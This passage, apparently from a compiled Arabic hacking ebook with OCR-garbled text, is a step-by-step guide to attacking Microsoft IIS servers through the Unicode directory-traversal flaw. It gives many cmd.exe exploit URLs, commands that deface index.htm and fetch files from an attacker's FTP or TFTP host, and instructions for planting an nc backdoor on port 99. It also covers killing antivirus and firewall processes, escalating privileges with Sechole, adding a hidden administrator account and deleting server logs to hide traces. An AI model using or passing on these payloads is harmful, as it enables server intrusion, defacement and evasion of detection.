و هذا مثال حى على الجدولالذى یظهر بعدتنفیذ الامر 

: 

C:\ WINDOWS>arp -a 

Interface: 62.135.9.102 on Interface 0x2 

Internet Address Physical Address Type 

207.46.226.17 20-53-52-43-00-00 dynamic 

213.131.64.2 20-53-52-43-00-00 dynamic 

213.131.65.238 20-53-52-43-00-00 dynamic 

الانترنتادرسالموجودامامكم هذاهى عناوینكل الشبكاتالمتصلهبجهاز ى بعد دخولى الىالانترنت 

وال Physicalاعتقدانكمتلاحظونانهثابت Address لایتغیر وبهذا یمكنناان نقول و نوضحلكم 

انال Physicalهذا Address هوال Macا Address ى رقم الجهاز نفسه الذى تتصلبه 

النتوركس اثناءالعمل ولذلكفقدقلتفىكلامىانتحدیدال Physical Address مهم جداافى 

اذنفكی ف ستعر فالباكیدجس 

عملیه 

الموجودهفىال routerعلى طریقها.‏ 

وال type هذا مكتوب dynamic ا ىانه غیرثابتبمعنىانهیتغییر عند عمل ریستارتلكل مرهفى 

الجهاز ولكنه یثبت اثناءالعمل علىالانترنت . 

و هناكالنو عالاخر وهوال staticاى الثابتالذ ى لایتغیر ‏"هذافقطللتوضیح " 

نقلمعلوماتاوبیاناتال ip لانهبدون Physical Address 

اعتقدالاناننافهمنابمعنىبسیط 

ما هوالروتنج و ماهىالrouters 

... 

٩١




الفصل الثالث 

 

‏((مقتطفات عن 

السیرفراتوالأنظمة))‏ 

٩٢


Sites UnDeR UtTaCk www.3 asfh.com/vb 

" 

الإختراق عن طریق الیونیكود 

‏(الجزء الأول)‏ " 

$$$$$$$$$$$$$$$ 

الكاتب sNiper_hEx: 

$$$$$$$$$$$$$$$ 

یحتو ى الدرسالاول على 

) ١٣ نقطة 

( وهيكما یلي 

- : 

. 

. 

- تعری فبالیونیكود . 

- تاریخ ظهور هذهالثغرة 

- كیفیةایجاد هذه الثغرات 

- كی فیتماستغلالثغراتالیونكود 

الاوامرالمستخدمةبواسطة مل ف 

طریقةتطبیق هذهالثغرات 

- كیفیةاختصارثغرةالیونیكود حتى تتمكن منتفعیلامر ال . ECHO 

طریقة نسخ مل فال CMD لاتاحةامكانیةالكتابة على الملفات . 

كیفیةمعرفة مشكلةال Access Denied وال حلول المتبعةلها . 

- كیفیة عملاكاون تللدخولبواسطة ال . FTP 

طریقةكش فباسوردالادمینستریتور 

- تغییر الصفحةالرئیسیةللموقع وعملیةالابلوودبواسطةبرنامج 

مسح ملفات اللوق حتى لایتمالتعر ف علیك 

. TFTP 

. 

. 

. CMD 

. 

. 

- 

- 

- 

- 

- 

- 

٩٣




IIS4.0 / 

- تعری فبالیونیكود . 

الیونیكود عبارة عن مجموعة من الثغراتفي مجموعة خدمةالمعلوماتالتي ركبت مع 

IIS5.0 والذي یاتي عادة مع 

. NT4 / Win2k 

. 

- تاریخ ظهور هذهالثغرة . 

لایوجدتاریخ محددلظهوراولثغرةللیونیكودلذایعتبر ظهورهابواسطة شخ ص مجهول 

،anonymous person وقیلاناول ظهورلثغراتالیونیكودكانتبواسطة الصینین ولكن لایوجد 

مایثبت صحة هذا الكلام لهذه الثغرات،‏ فتماستغلال هذه الثغرات منقبلالمخترقینوتطویرالبرامج 

اللازمةلها . 

- كیفیةایجاد هذه الثغرات 

یتمایجاد هذهالثغرا تبطریقتین -: 

١- بواسطةالبرامج اللازمة والمخصصةلكش ف هذهالثغرات سواءبالبرامجالتيتعمل على 

نظام ویندوزاوبطریقة الشل والتيتعمل على نظاملینكس 

٢- بواسطةتطبیق الثغرة علىالموقع مباشرة 

. 

. 

. 

. 

- 

- كی فیتماستغلالثغراتالیونكود 

عندتطبیقالثغرة على نظام ال IIS4 / IIS5 یبدا مل ف CMD بفك شفرةالیونكودفي المثالالخطاء 

ومنهنایتماستغلالها 

الاوامرالمستخدمةبواسطة مل ف . CMD 

الاوامرالمستخدمهبواسطة مل فال CMD وهيامر لانشاء دلیل جدید وامر لالغاء دلیل وامر النسخ 

وامرالنقل وامر الحذ ف وامرتغییراسماءالملفات وامرلرؤیة محتویات المل ف وامر الكتابة داخلأي 

مل ف وامرلسحبأي مل ف ، وهي حسبالامثلةالتالیة 

‏:امرانشاء دلیل جدید 

-: 

http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd. 

exe?/c+md+c:\hEx 

‏:امرالغاء دلیل 


exe?/c+rd+c:\hEx 

للمعلومیة:‏ لایمكنالغاءأي دلیلالااذاكانفارغاًتمام من الملفات والمجلدات 

الامر المستخدم 

: للنسخ 


exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.exe 

الامر المستخدم 

: للنقل 

http://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/c+m 

ove+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.exe+c:\ 

٩٤




‏:الامر المستخدم للحذ ف 


exe?/c+del+c:\hEx.mdb 

‏:الامر المستخدم لتغییر مسمى الملفات 

http://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/c+re 

n+c:\index.htm+hEx.htm 

‏:الامر المستخدملرؤیة محتویات الملف 


exe?/c+type+c:\hEx.txt 

‏:الامر المستخدمللكتابة داخلأي مل ف 

http://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/c+ec 

ho+sNiper_hEx+>c:\hEx.txt 

‏:الامر المستخدم لعملیة سحب أي مل ف 

علیكالقیاماولاًبنسخالمل فالمراد سحبهالىأي دلیل وبعدهایتم كتابةاسمالمل ففياخرالعنوانكالتالي 

: 

http://www.xxxx.com/msadc/hEx.mdb 

. 

- 

تطبیقالثغرة على الموقع من خلالالمتصف ح تتم حسبالامثلةالتالیة -: 

http://www.xxxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+di 

r+c:\ 

http://www.xxxx.com/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+di 

r+c:\ 

http://www.xxxx.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 

+c:\ 

http://www.xxxx.com/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir 

+c:\ 

http://www.xxxx.com/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+di 

r+c:\ 

http://www.xxxx.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+di 

r+c:\ 

http://www.xxxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+di 

r +c:\ 

وقد نحتاج الىتغییر مسمىالدلیلب حی ث یكون -: 

Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin 

طریقةتطبیق هذهالثغرات 

٩٥




. 

- كیفیةاختصارثغرةالیونیكود حتى تتمكن منتفعیلامرال ECHO 

في حالة اكتشا ف موقعیعاني من مشكلةالیونیكود ولنفتر ضانهكان على هذه الثغرة 

-: 

http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/c 

md.exe?/c+dir+c:\ 

فنحتاج الى نسخ مل ف w3svc.exe الى مجلد inetpub\scripts والامر یكونبهذهالطریقة 

- : 


md.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\w3sv 

c.exe 

بعد نسخ مل ف wالى 3 svc.exe مجلد inetpub\scripts ‏،الان نقوم بتصفح الموقع من خلال 

الثغرةبهذه الطریقة 

- : 

http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c:\ 

الان نستطیعالكتابة داخلأي مل ف وبالتحدیدالمل فالرئیسيللموقع الذي غالبا مایكونفي هذاالدلیل 

inetpub\wwwroot\index.htmب حی ث یكونالامربالشكلالتالي 

-: 

http://www.xxxx.com/scripts/w3svc.exe?/c+echo+Hacked+By+sNipe 

r_hEx+hExRay@Hotmail.com+>+c:\inetpub\wwwroot\index.htm 

- 

طریقة نسخ مل فا CMD لاتاحةامكانیةالكتابة على الملفات . 

الغر ض من نسخ مل ف الCMD وهو لاعطاءامكانیةللكتابة داخلالسیرفرفي بع ضالحالات ویتم 

نسخهالى مجلدالسیكربتبهذه الطریقة 

-: 


md.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd 

1.exe 

الانبامكاننااستخدام مل فالCMDالجدیدفي الثغرةبدلا منالاولبهذا الشكل 

- : 


md1.exe?c+dir+c:\ 

- : 


‏-كیفیةمعرفة مشكلة ال Access Denied وال حلولالمتبعةلها . 

تتممعرفة مشكلةال Access Denied من خلال المحاولةفي حذ فأي مل ف منأيامتداد،‏ فعند 

ظهور رسالةال Accessفالیك Denied هذه الطرق حتى تتمكن من الكتابة علىالملفات والتحكم 

اكثر علىالسیرفر 

الطریقةالاولى نسخ مل فال CMD الى دلیلالسیكربتبمسمى CMD1‎فسوفیتا حلكامكانیة 

الكتابةباستخدامالامر 

Copyباستخدام هذاالامر 

-: 


md.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd 

1.exe 

-٢ 

الطریقةالثانیةبالتعامل معالمل ف ssinc.dll والطریقةكما یلي 

اولاانشاء صفحةباسم 

- : 

test.shtml 

o 

٩٦

hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3 asfh.com/vb 

wwwroot/hEx/test.shtml 

o 

o 

o 

o 

o تكون هذهالصفحة داخل مجلد 

o كتابة هذا الكود داخلالصفحة !< file="AAAA[...]AA#-- include‏"-->ب حیثان 

حر فAیتم كتابتة حتىیتعدى ٢٠٤٩ حر ف 

الانیتم طلبالصفحة من خلالالمتصفح 

الان سو فتظهرلكالصفحة 

. 

http://www.xxxx.com/test.shtml 

. 

الانتستطیعالكتابهوتمتخطي مشكلةالDenied . Access 

. 

. 

-٣ 

- ٥ 

اذا ظهر تلك صفحةالخطاء رقم ‎٥٠٠‎فمعناهاانكلمتقم بتطبیقالطریقةبالشكلالص حیح 

وعلیكاعادة المحاولة 

الطریقة الثالثةباستخدامبرنامج NC.exeب حی ثیتم عملابلوودلهذاالمل ف داخل مجلد ال 

Tempفي دلیلالویندوز ومنهیتمتنفیذالاوامر من خلال موجةالدوز وللمعلومیة مجلدال 

Temp مفتوح لعملیاتالابلوود 

- ٤ الطریقة الرابعة وهي من خلال عملكرا شللسیرفرباستخدامالبرامجاللازمةلهذا الغر ض وهذه 

الطریقة غیر مجدیهفيكثیر منالاحیان . 

الب حث عن ملفات 

ونسخهاالى مجلد c:\inetpub\scripts وتطبیق الثغرة من خلالها . 

w3svc.exe ، shell.exe ، sensepost.exe ، root.exe : 

- كیفیة عملاكاون تللدخولبواسطةال 

نسخ مل ف CMDالى مجلد Scriptsباسم Shell.exe حتىیتمالاستفادة منثغرةقدیمة 

. FTP 


/c + copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 

open ftp.host.com وكتابةفیهالتالي Echo mspft.pllبواسطةالامر -٢ 

انشاء مل ف 

حیثان هذاهو الخادمللFTP . 

/c+echo+open+ftp.host.com+>+c:\winnt\mspft.ppl 

-٣ 

/shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl 

-٤ 

الان مطلوباضافة مجهول Anonymousالى نفسالمل فالذيقمنابانشاءه 

mspft.pll 

الان مطلوبادراج البرید hExRay@Hotmail.Comالى نفس المل ف الذيقمنابانشاءه 

mspft.pll 

/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl 

mspft.pll 

/shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl 

-٦ 

/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl 

٧- یتم هناادراجالموقعالحاليللملفات 

/shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.ppl 

-٨ 

‎٥‎‏-إ ضافة Userقبل Anonymous لزوم المل ف الذيقمنابانشاءه 

الانتكرار لحاجةالاعداد 

الان یكتباوامر الFTPاللازمةلسحبالمل ف من خادم الFTP وهي Getثم index.htm 

یدرج هنابدونالمسجالسابق 

/shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl 

Quit 

/shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl 

FTP.exe?+"-s:c:winnt\mspft.ppl” 

-١٠ 

-: 

- Open FTP.host.com 

٩- هنا نفس السابق ولكنباضافة 

الانیتمتنفیذامر 

بانشاءها وموجودةفي مل ف mspft.pplباحتوائها على مایلي 

وهو عبارة عن خطواتقمنا 

٩٧




- Anonymous 

- hEx@Hotmail.Com 

- User Anonymous 

- hEx@Hotmail.Com 

- Get index.html 

- Quit 

/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"- 

s:c:\winnt\mspft.ppl" 

. 

) L0phtCrack ( Microsoft Access – وهي لزومتنفیذ بع ض 

- : 

- 

- 

طریقةكش فباسوردالادمینستریتور 

نحتاج الى وجودبرنامجین 

الخطوات لتالیة وهي 

باسوردالادمینستیتورللسیرفر یكون موجودفي مل فال ‏_.‏SAMفي دلیل 

وافضلبرنامج لفك شفرةالباسورد هوبرنامج Lكماهو 0 phtCrack موضحبالشكل التالي:-‏ 

\winnt\repair\ 

- 

اذاكان هناك مستخدمینفيالسیرفر ویوجدلدیهم حسابفانمعلوماتهم سو فتكونفي ملف 

PASSFILT.DLL ونستطیعتحدید مسار هذ االمل ف من خلالالریجستريبواسطة هذا المفتاح 

- : 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\S 

YSTEM32\PASSFILT.DLL 

- 

اذاكانالسیرفریعتمدفي القراءةباستخدام صفحاتال ASPللوصولالىالبیانات من خلال 

قاعدة ال MySQLفسو ف نحتاج الىتطبیقثغرة 

المسئول عن هذةالقاعده وهيكالتالي 

) +.htr ( للوصول الىباسورد 

- : 

http://www.xxxx.com/default.asp+.htr 

عند ظهور صفحةالخطافي الوصول الى الصفحةالمطلوبة وبالتحدیدفي سیكربتالتنفیذفالطریقة 

ص حیحة وماعلینافقط سوى سحب مل ف database.inc وقراءة محتویاتهللعثور علىاسم 

المستخدم والباسوردللمسئول عنقاعدةالبیانات . 

٩٨


. TFTP 



- تغییر الصفحةالرئیسیةللموقع وعملیةالابلوودبواسطةبرنامج 

قمبانشاء صفحة وضعشعارك علیها واحفظهاباسم index.htm علىال 

قم بتشغیلبرنامج TFTP ونفذالامرفي الفقرةالتالیة 

c:\ 

. 

/c+tftp.exe+"- 

i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\i ndex.htm 


-٢ 

وهوالبرنامجاللازم لعملالابلوود ویجبان یكون شغالفي حالةتنفیذ 

الامر 

وهوبمثابةبارامیترز لزومقراءالبیاناتفي مكتبة الملفات 

tftp.exe 

"-i" 

رقمالایبيالخا صبك 1.1.1.1 

وهوالامراللازملطلب الملفات مابینالارسال والاستقبال 

اسمالمل فبجهازك 

اسمالدلیلفيالسیرفر 

GET 

index.htm 

\inetpub\wwwr 

oot\ 

index.htm 

اسمالمل ف علىالسیرفر 

. 

- 

مسح ملفات اللوق حتى لایتمالتعر ف علیك 

وتتم هذهالعملیة من خلال حذ ف ملفاتال Log من مجلد 

System32‎بواسطةالامر 

- : 

/c+del+c:/winnt/system32/logfiles/*.log 

.... 

٩٩




" 

$$$$$$$$$$$$$$ 

XDEMONX: 

$$$$$$$$$$$$$$ 

الكاتب 

.. 

الإختراق عن طریق الیونیكود 

‏(الجزء الثاني)‏ " 

في الدرس الأول كان عبارة عناوامراساسیة یستطیعالجمیعتطبیقها ‏..امافي هذا الدرسفالأمر 

یتطلب بع ضالذكاء والمهارة 

البدایة 

.. 

: 

-------------- 

عند وجود موقع مصاب بثغرة ما ‏(یونیكود)فاناول شي علیكالقیامبه هو نسخ مجلد cmd الى cmd1 

بهذهالطریقة:‏ 

C+copy+c:\winnt\system32+ 

Echo .. هوتفعیلامر الكتابة c:\winnt\system32\cmd1.exeوالسبب 

وبعد ذلك نفذالثغرة منالمل فالجدید ( CMD1.exe هذا شيیعرفه الجمیع ‏)لكنللتذكیرفقط ! 

الان عندتصف حكلملفاتالموقع منالمتصفح من خلال هذهالثغرةفانه سیكونلدیك صلاحیات 

IWAM_USERوهذا المستخدم هو عبارة عن یوزرینتميللمجموعه Guest وهوالیوزرالمسؤوول 

عنتشغیل سیرفر.‏ IIS 

وبماانه من مجموعة Guestفهو لا یملك صلاحیاتكثیرة ‏!!الااذاتماعدادهبشكل سيء :) 

(: هذافيانظمة *nix امافي Microsot 

.. 

لایوجد شياكثرادمانا من محاولةال حصول على رووت 

فالوضع مختل ف ‏:)فإن محاولةال حصول على صلاحیات Administratorلیسبالسهولةالتي تتوقعها 

‏:)فرفعالامتیازا تبشكل م حليفيانظمة مایكروسوفت ممكنفقطبطر ققلیلة لایتعد ى عددهااصابعالید 

الواحده .. وانااكتب هذاالموضو ع لاشر حكیفیةاحكامالسیطرة علىالسیرفر وال حصول على حساب 

موارد النظام 

مكافيءللمدیر 

‏+الملفات المطلوبة 

:) والتمتعبجمیع 

: 

Sechole.exeوملحقاتها.‏ 

Kill.exe 

Tlist.exe 

ncx99.exe 

tftpd32.exe 

جهز العده :) .. 

لتوفیرالوقت جمعتهافي مجلد واحدهنا 

الان سأشرح عملكلاداة : 

) 


Secholeوهواقوىاستثمار موجودلرفعالامتیازا تبشكل م حلي ‏..وطریقة عمله بشكل مبسط)‏ 

بأنهیعتمد على صد عفي نواة ویندوزانتي ‏..یستطیع من خلاله اغتصاب عملیةتابعهلمدیرالنظام یقوم 

١٠٠




من خلالهابرفعامتیازاتك 

. (: 

list -٢ 

(: 

تقوم بعر ض جمیعالعملیاتالتيتعملبالخلفیه .. والفائده منها هواقفال الفایروول ‏+الانتي 

فایروس 

٤- Kill.exeعملها متم مللاداةالسابقة حی ث ستقومباقفال رقمالعملیة المستخرج منالاداة السابقة 

NCX99‎نسخه ٥ مطورة من الباكدوور NCینصت علىالمنفذ ٩٩ 

لنقل الملفاتالىالسیرفر 

. 

.. 

4- TFTP32.exe 

كل ما سبقكان عبارة عن مقدمه ‏:)اماالعملالحقیقي سیبدأالان 

: 

اولاقمبرفع جمیعالادواتالسابق الىالسیرفر 

ثمقم بتشغیل ncx99.exeبهذاالشكل مثلا 

.. 

: 

http://target/scripts/..À¯../winnt/system32/cmd1.exe?/c+C:\ncx99.exe 

بعد ذلكقمبالاتصالبالموقع علىالبورت .. ٩٩ 

ست حصل على سطراوامر CMDبدون 

الانقم بتشغیلالاداة .. TLIST ستعر ضلك جمیعالعملیاتالتيتعمل ‏..قمبالب حث عن رقمالعملیة 

صبالانتيفایروسان وجد .. وكذلكاذا وجدت جدار ناري 

PIDالخا صبالانتيفایروس والفایروول على ورقه جانبیه 

سجل رقم PID الخا مكان PIDتضع رقمالعملیة 

مالهد ف مناقفالالانتيفایروس ؟ الاجابة ‏..أن التحدیثاتالاخیرة منانتيفایروس 

ض یسأل البع تتعامل مع Sechole علىانهباكدور .. والان بعد اتمامالعملیاتالسابقةبنجاح ‏..قم بتشغیل 

(: 

امتیازا ت.‏ = Guest 

.. 

.. 

الانقم بقتلالاجراءبالاداة Killبهذاالشكل .. PID : KILL.exe 

! 

(: Sechole.exeمنالمتصفح.‏ 

.. 

.. 

. 

عندها سیتم رفمامتیازا ت IWAM_USER الى مجموعه..‏ Administrators 

الان بإ مكانكتنفیذه جمیعالاوامر بكاملالحریه وبدوناي مشاكلفيالصلاحیا ت.‏ Access Denided 

وطبعااهم شيالكتابة على الصفحهالرئیسیةبامرالایكو:‏ 

C+Echo+Hacked+by+XDeMoNX+ 

> +C;\inetpub\wwwroot\index 

.htm 

ولكنلیس هذاكل شي 

القراصنهالاذكیاء لا یبحثونفقط عنتغییر الصفحهالرئیسیة خصوصااذاكانالموقع مهماو یحتوي على 

معلوماتاوقواعدبیانات ‏...إلخ :) 

سؤال ‏:هلتستطیع الدخولبهذاالیوزر ؟ IWAM_USER الىاي خدمه مثلتلنتاوا فتيبي ؟؟ 

الاجابة ‏:لا ص حیحانناقمنابرفعامتیزاتهلكننا لا نملككلمه المرور ‏!لانها س تكون مسندهبشكل 

عشوائي 

١٠١


سیذهبتفكیر البع ض الى ال حصول على مل فالسام وكسره :) هذا ممكن ‏..لكن یوجد ماهواسهل . 

بمااننالدینا حساب مكافيل Administrator ولكننا لا نملككلمةالمرور ما رأیكبإ ضافه یوزر جدید 

باسمك معباسورد خاصهبك معامتیازات المدیرایضا !! ‏:)قلیل من الذكاء والتفكیر 

قمبانشاء مستند نصي جدید واض ف السطر التالي 

. 

(: 

: 

net user Demon pass /add && net localgroup administrators Demon 

add.bat واحفظهاباسم.‏ Save as add‏/والان 

: 

(: المدراء .. 

) 

(: 

(: 

.. 

توضیح ما فعلناه سابقا هوانشاء مجلد دفعاتي یقومبانشاء یوزر جدید Demon وكلمة مرور Pass 

واضافتهالى مجموعةالادمنستریتورز 

قمالانبرفعالمل ف add.batثمتشغیلها منالمتصفح بواسطةالیونكود)‏ 

الانلدیك حساب مدیر :) وتستطیعالدخولالىاي خدمه ‏..ا فتيبياوتلنتاو ن تبیوساو غیرها 

لاتنسىفيالنهایة مسحالاثار واضافةالابوابالخلیةالخاصةبك لتسهیل الدخولفي المراتالقادمه 

طبعالن اتوسعفي هذا الجانب لانه ‏(لكلشیخ طریقة!)‏ وكل واحدلهاسلوبفياخفاءادواته والتحكمفي 

الملفات . 

(: 

نرجعلنقطة سابقة 

هلتذكراني طلبت منكاقفال الفایروول ؟؟لماذا ؟ 

لو جرب تتنفذالامر netstat -an من خلال سطراوامرالان سي ‏..فانك ستجد منالمنافذ ما یسر القلب 

‏%‏‎90‎منالسیرفراتاللي دخلتها وكانت محمیةبجدران نار :) وجدت المنفذ ‎139‎فیها مفتوحابدون 

حمایه ‏:)لذافاناقفالالفایرولقد یجعللكاكثر من خیارلاسقاطالهد ف 

...(: 

١٠٢

" 




‏"معلومات عامة عن كیفیة الاستفادة من ثغرات الیونیكود 

$$$$$$$$$$$ 


$$$$$$$$$$$ 

الموضوعیتكلم عناسالیبالتحكمفيالسیرفر عبرالیونیكود مع بع ضالمتطلبات 

الادواتالمطلوبه 

‎١‎‏)اداة مسحثغرات یونیكود 

‎٢‎‏)برنامج سیرفر TFTPD 

٣) معرفة جیدهبالیونیكود 

================================================= 

١) بأمكانكال 

(( 

http://www.devil2k.com/ 

/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ 

/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/ 

cmd.exe?/c+dir+c:\ 

/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+ 

c:\ 

/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/sy 

stem32/cmd.exe?/c+dir+c:\ 

/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 

/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c 

:\ 


/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ 

/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+ 

c:\ 

/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.ex 

e?/c+dir+c:\ 

/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/ 


/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir 

+c:\ 

/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+ 

dir+c:\ 

/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/ 


/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/s 

ystem32/cmd.exe?/c+dir+c:\ 

/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd. 

exe?/c+dir+c:\ 

حصول علىثغراتالیونیكود منالعدید من المواقعاو من موقعي 

وهذه مهداه منيانا ‏((بلاك هنتر 

: 

١٠٣




/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/c 


/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../wi 

nnt/system32/cmd.exe?/c+dir+c:\ 

/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 

35%63../winnt/system32/cmd.exe?/c+dir+c:\ 

/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 

/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 

/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/ 

c+dir+c:\ 

/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cm 

d.exe?/c+dir+c:\ 

/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 

/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 

/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir 

+c:\ 

/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe 

?/c+dir+c:\ 

/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd. 


/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/c 


/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../wi 

nnt/system32/cmd.exe?/c+dir+c:\ 

/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 


/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32 

/cmd.exe?/c+dir+c:\ 

/cgibin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd. 


/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32 


/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32 


/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/syste 

m32/cmd.exe?/c+dir+c:\ 

/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.e 

xe?/c+dir+c:\ 

/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.e 

xe?/c+dir+c:\ 

١٠٤

١٠٥ 




/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd. 


/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c 

:\ 









/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di 

r+c:\ 

/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ 

dir+c:\ 


/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ 








/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 

/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 

/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 

/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 

/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system 

32/cmd.exe\?/c+dir+c:\ 

/cgibin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd 

.exe?/c+dir+c:\ 

/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3 

2/cmd.exe?/c+dir+c:\ 

/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/syste 


/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3 

2/cmd.exe?/c+dir+c:\ 

/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3 

2/cmd.exe?/c+dir+c:\




/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/syste 


٢) بأمكانكال حصول علىبرنامج TFTPD منالموقع http://iisbughelp.4t.com/ 

٣) معرفةالیونیكودبسیطه جدا یكفيانتعر فكی فتستطیعالانتقال عبر الهاردیسكات وعبرالملفات 

) تعمل عبرالمتصفح ( 

/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ 

dir+C:\ 

لقرائه مابداخلهاردیسك \ : C 


dir+D:\ 

لقرائه مابداخلهاردیسك \ : D 


dir+E:\ 

لقرائه مابداخلهاردیسك \ : E 

نقوم بعمل سكان على الموقعلنرى مابه منثغرات وهنا مثال علىثغرات مبتدأهبالمجلد المطلوب 

اغلبثغراتالیونیكودتنطلق من هذهالمجلدات 

)) 

(١ مثالالمجلد msadc 


r+C:\ 

vti_bin_ (٢ 

/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ 

dir+C:\ 

مثالالمجلد 

(( 

في سیرفرات IIS عندتركیبها ‏((بشكل عادي )) یكونالمجلدالرئیسيللویبتح تاسممعین وهو 

C:\Inetpub\wwwroot 

اوفيالمجلد 

D:\Inetpub\wwwroot 

اوفيالمجلد 

E:\Inetpub\wwwroot 

في العاده یكونفي الهاردیسك C ولذلك سأكمل شرحي علىانههناك 

ستجدفي هذاالمجلد عادة جمیعالمواقع التي علىالسیرفر 

: 

فلو وجدناثغرة یونیكود ما ولتكن 


r+c:\ 

وأردناالولوج الى هذاالمل فلنرى مابهفسنكتبالثغره هكذا : 


r+C:\Inetpub\wwwroot 

١٠٦




اذاكانالسیرفر یحوي عدة مواقعفستجدهاكل موقعباسمه ) ستجدهافي مجلداتبداخل مجلدال 

) wwwrootامالوكانالسیرفر عباره عن موقع واحدفقطفستجدكافةالملفاتفي مجلدال 

wwwroot نفسه 

فياغلبالظن یقومالهاكر بتغییرالصفحةالرئیسیهالاولى وعلیكانتعلمانهلیس دائماالصفحةالرئیسیه 

